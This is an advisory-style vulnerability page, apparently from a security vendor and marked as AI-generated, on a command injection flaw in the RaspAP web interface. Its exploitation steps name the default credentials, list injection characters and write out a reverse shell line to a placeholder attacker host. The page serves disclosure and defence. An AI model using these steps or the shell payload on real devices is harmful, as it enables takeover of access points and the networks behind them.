CVE-2026-24788: 
PHP vulnerability analysis and mitigation

Overview

CVE-2026-24788 is an OS Command Injection vulnerability in RaspAP's raspap-webgui web management interface affecting all versions prior to 3.3.6. It allows any authenticated user to execute arbitrary OS commands on the underlying system over the network. The vulnerability was published on February 2, 2026, with the fix released in version 3.3.6. It carries a CVSS v3 base score of 8.8 (High) and a CVSS v4 base score of 8.7 (High) (GitHub Advisory, Feedly).

Technical details

The vulnerability is classified as CWE-78 (Improper Neutralization of Special Elements used in an OS Command), meaning the application constructs OS commands using user-supplied input without adequately sanitizing or escaping shell metacharacters (GitHub Advisory). The attack vector is network-based, requires low privileges (a valid login to the RaspAP web interface), no user interaction, and low attack complexity. The fix was introduced in commit f514f5a of the raspap-webgui repository (GitHub Advisory). The vulnerability was assigned by JPCERT/CC and is also tracked as JVN#27202136 (JVN).

Impact

Successful exploitation grants an authenticated attacker the ability to execute arbitrary OS commands on the host system running RaspAP, resulting in high impact to confidentiality, integrity, and availability. An attacker could read sensitive configuration files and credentials, modify system data, disrupt network services managed by RaspAP, or use the compromised device as a pivot point for lateral movement within the network (GitHub Advisory, Feedly). RaspAP is commonly deployed on Raspberry Pi devices acting as wireless access points, so compromise could affect all clients connected through the device.

Exploitability

As of the time of disclosure, there is no public proof-of-concept exploit code and no evidence of active in-the-wild exploitation (Feedly). The vulnerability is not listed in the CISA Known Exploited Vulnerabilities (KEV) catalog. The EPSS score is approximately 0.105% (28th percentile), indicating a relatively low near-term exploitation probability (GitHub Advisory). Exploitation requires valid credentials to the RaspAP web interface, which limits the attack surface compared to unauthenticated vulnerabilities.

Exploitation steps

  1. Reconnaissance: Identify internet-facing or LAN-accessible RaspAP instances running raspap-webgui versions prior to 3.3.6 using network scanning tools (e.g., Nmap, Shodan) targeting the default RaspAP web port (typically port 80 or 443).
  2. Authentication: Log in to the RaspAP web interface using valid credentials (default credentials are admin/secret on many installations if not changed).
  3. Identify injection point: Navigate to a web interface feature that passes user-controlled input to an OS command — such as network configuration, wireless settings, or system management functions.
  4. Inject OS command payload: Submit a crafted input containing shell metacharacters (e.g., ;, |, $(...), or backticks) appended with an arbitrary command (e.g., ; id, | whoami, or a reverse shell payload such as ; bash -i >& /dev/tcp/ATTACKER_IP/PORT 0>&1).
  5. Achieve code execution: The server processes the unsanitized input and executes the injected command in the context of the web server process, granting the attacker OS-level access to the Raspberry Pi host (GitHub Advisory, JVN).

Indicators of compromise

  • Network: Unexpected outbound connections from the RaspAP host to external IP addresses, particularly on non-standard ports (indicative of reverse shell activity); unusual DNS queries originating from the device.
  • Logs: Web server access logs showing POST requests to RaspAP configuration endpoints containing shell metacharacters (;, |, $(), backticks) in parameter values; authentication logs showing successful logins followed immediately by anomalous activity.
  • Process: Unexpected child processes spawned by the web server process (e.g., bash, sh, curl, wget, python, nc); processes running under the web server user account performing network connections.
  • File System: New or modified files in web-accessible directories (e.g., web shells); new cron jobs or systemd services created by the web server user; unexpected SSH authorized_keys modifications.

Mitigation and workarounds

The primary remediation is to upgrade raspap-webgui to version 3.3.6 or later, which contains the fix for this vulnerability (GitHub Advisory, RaspAP Releases). As interim workarounds, administrators should restrict network access to the RaspAP web interface to trusted networks only (e.g., via firewall rules), change default credentials immediately, and enforce strong authentication for all RaspAP user accounts. Monitoring for suspicious command execution patterns on affected systems is also recommended until patching is complete (Feedly).

Community reactions

The vulnerability received coverage from The Hacker Wire and was noted on Mastodon/Infosec.Exchange and Bluesky shortly after disclosure (The Hacker Wire). VulDB also tracked and published information on the vulnerability. Community reaction was moderate, consistent with the authenticated-only exploitation requirement limiting broader alarm. No major vendor statements beyond the GitHub advisory and JVN disclosure were identified.

Additional resources


Source: This report was generated using AI

Related PHP vulnerabilities:

CVE ID

Severity

Score

Technologies

Component name

CISA KEV exploit

Has fix

Published date

CVE-2026-55224HIGH8.7
  • PHP logoPHP
  • mineadmin/mineadmin
NoYesSep 30, 2026
CVE-2026-103111HIGH7.6
  • MariaDB Server logoMariaDB Server
  • mariadb11.8-server
NoYesSep 30, 2026
GHSA-3q6v-r5mr-hxv8HIGH7.5
  • PHP logoPHP
  • league/commonmark
NoYesSep 30, 2026
GHSA-97jj-33gv-5xf9MEDIUM6.1
  • PHP logoPHP
  • league/commonmark
NoYesSep 30, 2026
CVE-2026-104181MEDIUM5.4
  • PHP logoPHP
  • filament/filament
NoYesOct 01, 2026

Free Vulnerability Assessment

Benchmark your Cloud Security Posture

Evaluate your cloud security practices across 9 security domains to benchmark your risk level and identify gaps in your defenses.

Request assessment

Get a personalized demo

Ready to see Wiz in action?

"Best User Experience I have ever seen, provides full visibility to cloud workloads."
David EstlickCISO
"Wiz provides a single pane of glass to see what is going on in our cloud environments."
Adam FletcherChief Security Officer
"We know that if Wiz identifies something as critical, it actually is."
Greg PoniatowskiHead of Threat and Vulnerability Management